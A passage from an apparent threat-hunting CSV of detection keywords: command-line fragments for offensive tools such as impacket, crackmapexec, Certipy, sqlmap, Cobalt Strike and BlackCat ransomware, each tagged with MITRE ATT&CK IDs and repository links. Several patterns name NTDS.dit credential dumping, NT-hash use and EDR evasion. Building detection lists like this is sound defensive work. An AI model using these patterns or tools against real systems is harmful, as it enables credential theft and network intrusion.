Active Directory Certificate Services enumeration and abuse,T1555 T1588 T1552,N/A,N/A,N/A,Exploitation tools,https://github.com/ly4k/Certipy,1,0,N/A,10,10,1765,243,2023-09-26T00:51:47Z,2021-10-06T23:02:40Z -* -no-pass -just-dc-user *,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -* -no-pass rid-hijack*,offensive_tool_keyword,wmiexec-pro,The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement,T1021.006 - T1560.001,TA0008 - TA0040,N/A,N/A,Network Exploitation tools,https://github.com/XiaoliChan/wmiexec-Pro,1,0,N/A,N/A,8,790,98,2023-07-31T03:58:14Z,2023-04-04T06:24:07Z -* -no-pass -usersfile *,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,0,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -* NoPowerShell.*,offensive_tool_keyword,C2 related tools,PowerShell rebuilt in C# for Red Teaming purposes,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider,C2,https://github.com/bitsadmin/nopowershell,1,0,N/A,10,10,761,126,2021-06-17T12:36:05Z,2018-11-28T21:07:51Z -* No-PowerShell.cs*,offensive_tool_keyword,No-powershell,powershell script to C# (no-powershell),T1059.001 - T1027 - T1500,TA0002 - TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/gtworek/PSBits/blob/master/Misc/No-PowerShell.cs,1,0,N/A,8,10,2669,471,2023-09-28T06:10:58Z,2019-06-29T13:22:36Z -* --no-ppid-spoof*,offensive_tool_keyword,CSExec,An alternative to *exec.py from impacket with some builtin tricks,T1059.001 - T1059.005 - T1071.001,TA0002,N/A,N/A,Lateral Movement,https://github.com/Metro-Holografix/CSExec.py,1,0,private github repo,10,,N/A,,, -* -no-preauth * -dc-ip *,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -* -NoPRo -wIN 1 -nONi -eN Sh33L*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,0,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -* --no-prop*,offensive_tool_keyword,blackcat ransomware,BlackCat Ransomware behavior,T1486.001 - T1489 - T1490 - T1486,TA0011 - TA0010 - TA0012 - TA0007 - TA0040,blackcat ransomware,N/A,Ransomware,https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* --no-prop-servers*,offensive_tool_keyword,blackcat ransomware,BlackCat Ransomware behavior,T1486.001 - T1489 - T1490 - T1486,TA0011 - TA0010 - TA0012 - TA0007 - TA0040,blackcat ransomware,N/A,Ransomware,https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* --no-sigthief*,offensive_tool_keyword,CSExec,An alternative to *exec.py from impacket with some builtin tricks,T1059.001 - T1059.005 - T1071.001,TA0002,N/A,N/A,Lateral Movement,https://github.com/Metro-Holografix/CSExec.py,1,0,private github repo,10,,N/A,,, -* --no-vm-kill*,offensive_tool_keyword,blackcat ransomware,BlackCat Ransomware behavior,T1486.001 - T1489 - T1490 - T1486,TA0011 - TA0010 - TA0012 - TA0007 - TA0040,blackcat ransomware,N/A,Ransomware,https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* --no-vm-snapshot-kill*,offensive_tool_keyword,blackcat ransomware,BlackCat Ransomware behavior,T1486.001 - T1489 - T1490 - T1486,TA0011 - TA0010 - TA0012 - TA0007 - TA0040,blackcat ransomware,N/A,Ransomware,https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* --no-wall*,offensive_tool_keyword,blackcat ransomware,BlackCat Ransomware behavior,T1486.001 - T1489 - T1490 - T1486,TA0011 - TA0010 - TA0012 - TA0007 - TA0040,blackcat ransomware,N/A,Ransomware,https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* nping-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* nrpe-enum.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* NtCr3at3Thr3adEx @ *,offensive_tool_keyword,NTDLLReflection,Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID to avoid opening a handle to ntdll and trigger exported APIs from the export table,T1055.012 - T1574.002 - T1027.001 - T1218.011,TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/NTDLLReflection,1,0,N/A,9,3,278,42,2023-08-02T02:21:43Z,2023-02-03T17:12:33Z -* -ntds *.dit *-system *,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,0,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -* -ntds NTDS.dit -filters*,offensive_tool_keyword,ntdissector,Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.,T1003.003,TA0006 ,N/A,N/A,Credential Access,https://github.com/synacktiv/ntdissector,1,0,N/A,9,1,73,6,2023-10-03T14:17:00Z,2023-09-05T12:13:47Z -* -ntds NTDS.dit -system SYSTEM -outputdir /*,offensive_tool_keyword,ntdissector,Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.,T1003.003,TA0006 ,N/A,N/A,Credential Access,https://github.com/synacktiv/ntdissector,1,0,N/A,9,1,73,6,2023-10-03T14:17:00Z,2023-09-05T12:13:47Z -* -ntds ntds.dit.save -system system.save LOCAL*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* --ntds-history*,offensive_tool_keyword,crackmapexec,crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -* --ntds-pwdLastSet*,offensive_tool_keyword,crackmapexec,crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -* -nthash * -domain-sid *,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,0,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -* -nthash * -spn * -domain-sid * -domain *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* -nthash *-domain-sid S-1-5-11-39129514-1145628974-103568174 -domain*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* ntlm.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,0,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -* ntlm.wordlist *--hex-wordlist*,offensive_tool_keyword,hashcat,Worlds fastest and most advanced password recovery utility.,T1110.001 - T1003.001 - T1021.001,TA0006 - TA0009 - TA0010,N/A,N/A,Credential Access,https://github.com/hashcat/hashcat,1,0,N/A,10,10,18342,2659,2023-10-03T07:17:40Z,2015-12-04T14:46:51Z -* --ntlm-proxy-ip * --ntlm-proxy-port *,offensive_tool_keyword,rpivot,socks4 reverse proxy for penetration testing,T1090.004 - T1572 - T1021.001,TA0011 - TA0002 - TA0040,N/A,N/A,C2,https://github.com/klsecservices/rpivot,1,0,N/A,10,10,490,125,2018-07-12T09:53:13Z,2016-09-07T17:25:57Z -* ntlmrecon*,offensive_tool_keyword,NTMLRecon,A fast and flexible NTLM reconnaissance tool without external dependencies. Useful to find out information about NTLM endpoints when working with a large set of potential IP addresses and domains,T1595,TA0009,N/A,N/A,Network Exploitation tools,https://github.com/pwnfoo/NTLMRecon,1,0,N/A,N/A,5,419,67,2023-08-31T05:39:48Z,2019-12-01T06:06:30Z -* NTLMv1 captured *,offensive_tool_keyword,cobaltstrike,Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nccgroup/nccfsas,1,0,N/A,10,10,594,117,2022-08-05T16:25:42Z,2020-06-25T09:33:45Z -* ntlmv1.py*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* --nt-offsets *.csv*,offensive_tool_keyword,EDRSandBlast,EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections,T1547.002 - T1055.001 - T1205,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/wavestone-cdt/EDRSandblast,1,0,N/A,10,10,1117,224,2023-09-22T14:18:21Z,2021-11-02T15:02:42Z -* ntp-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ntp-monlist.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* nuages.formatImplantLastSeen*,offensive_tool_keyword,Nuages,A modular C2 framework,T1027 - T1055 - T1071 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/p3nt4/Nuages,1,0,N/A,10,10,373,80,2023-10-02T23:24:19Z,2019-05-12T11:00:35Z -* NuagesImplant*,offensive_tool_keyword,Nuages,A modular C2 framework,T1027 - T1055 - T1071 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/p3nt4/Nuages,1,0,N/A,10,10,373,80,2023-10-02T23:24:19Z,2019-05-12T11:00:35Z -* -o /share/payloads/*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,0,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z -* -o cowroot*,offensive_tool_keyword,POC,POC exploitation for dirtycow vulnerability,t1543,TA0003,N/A,N/A,Exploitation tools,https://github.com/exrienz/DirtyCow,1,0,N/A,N/A,1,27,27,2018-07-23T02:07:24Z,2017-05-12T10:38:20Z -* -o ffuf.csv*,offensive_tool_keyword,ffuf,Fast web fuzzer written in Go,T1110 - T1550,TA0006 - TA0008,N/A,N/A,Reconnaissance,https://github.com/ffuf/ffuf,1,0,N/A,N/A,10,10177,1154,2023-09-20T16:02:23Z,2018-11-08T09:25:49Z -* -oA icebreaker-scan*,offensive_tool_keyword,icebreaker,Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment,T1110.001 - T1110.003 - T1059.003,TA0006 - TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/DanMcInerney/icebreaker,1,0,N/A,10,10,1175,168,2018-10-24T18:14:53Z,2017-12-04T03:42:28Z -* --obfuscate *,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,0,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -* octopus.py*,offensive_tool_keyword,octopus,Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.,T1071 T1090 T1102,N/A,N/A,N/A,C2,https://github.com/mhaskar/Octopus,1,0,N/A,10,10,702,158,2021-07-06T23:52:37Z,2019-08-30T21:09:07Z -* -old-bloodhound*,offensive_tool_keyword,Certipy,Tool for Active Directory Certificate Services enumeration and abuse,T1555 T1588 T1552,N/A,N/A,N/A,Exploitation tools,https://github.com/ly4k/Certipy,1,0,N/A,10,10,1765,243,2023-09-26T00:51:47Z,2021-10-06T23:02:40Z -* omp2-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* omp2-enum-targets.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* omron-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* --oneliner-nothidden*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,0,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -* onesixtyone.c*,offensive_tool_keyword,onesixtyone,Fast SNMP scanner. onesixtyone takes a different approach to SNMP scanning. It takes advantage of the fact that SNMP is a connectionless protocol and sends all SNMP requests as fast as it can. Then the scanner waits for responses to come back and logs them in a fashion similar to Nmap ping sweeps,T1046 - T1018,TA0007 - TA0005,N/A,N/A,Reconnaissance,https://github.com/trailofbits/onesixtyone,1,0,N/A,N/A,5,416,86,2023-04-11T18:21:38Z,2014-02-07T17:02:49Z -* --only-abuse --dc-host *,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -* --only-known-exploit-paths*,offensive_tool_keyword,Coercer,A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.,T1110 - T1021 - T1020,TA0006 - TA0010,N/A,N/A,Exploitation tools,https://github.com/p0dalirius/Coercer,1,0,N/A,N/A,10,1359,152,2023-09-22T07:44:36Z,2022-06-30T16:52:33Z -* openflow-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* openlookup-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* openvas-otp-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* openwebnet-discovery.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* oracle-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* oracle-brute-stealth.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* oracle-enum-users.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* oracle-sid-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* oracle-tns-version.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* --os-bof*,offensive_tool_keyword,sqlmap,Automatic SQL injection and database takeover tool.,T1190 - T1556 - T1574,TA0001 - TA0002 - TA0003,N/A,N/A,Exploitation tools,https://github.com/sqlmapproject/sqlmap,1,0,N/A,N/A,10,28282,5460,2023-09-28T18:34:55Z,2012-06-26T09:52:15Z -* --os-cmd whoami*,offensive_tool_keyword,sqlmap,Automatic SQL injection and database takeover tool.,T1190 - T1556 - T1574,TA0001 - TA0002 - TA0003,N/A,N/A,Exploitation tools,https://github.com/sqlmapproject/sqlmap,1,0,N/A,N/A,10,28282,5460,2023-09-28T18:34:55Z,2012-06-26T09:52:15Z -* --os-pwn*,offensive_tool_keyword,sqlmap,Automatic SQL injection and database takeover tool.,T1190 - T1556 - T1574,TA0001 - TA0002 - TA0003,N/A,N/A,Exploitation tools,https://github.com/sqlmapproject/sqlmap,1,0,N/A,N/A,10,28282,5460,2023-09-28T18:34:55Z,2012-06-26T09:52:15Z -* 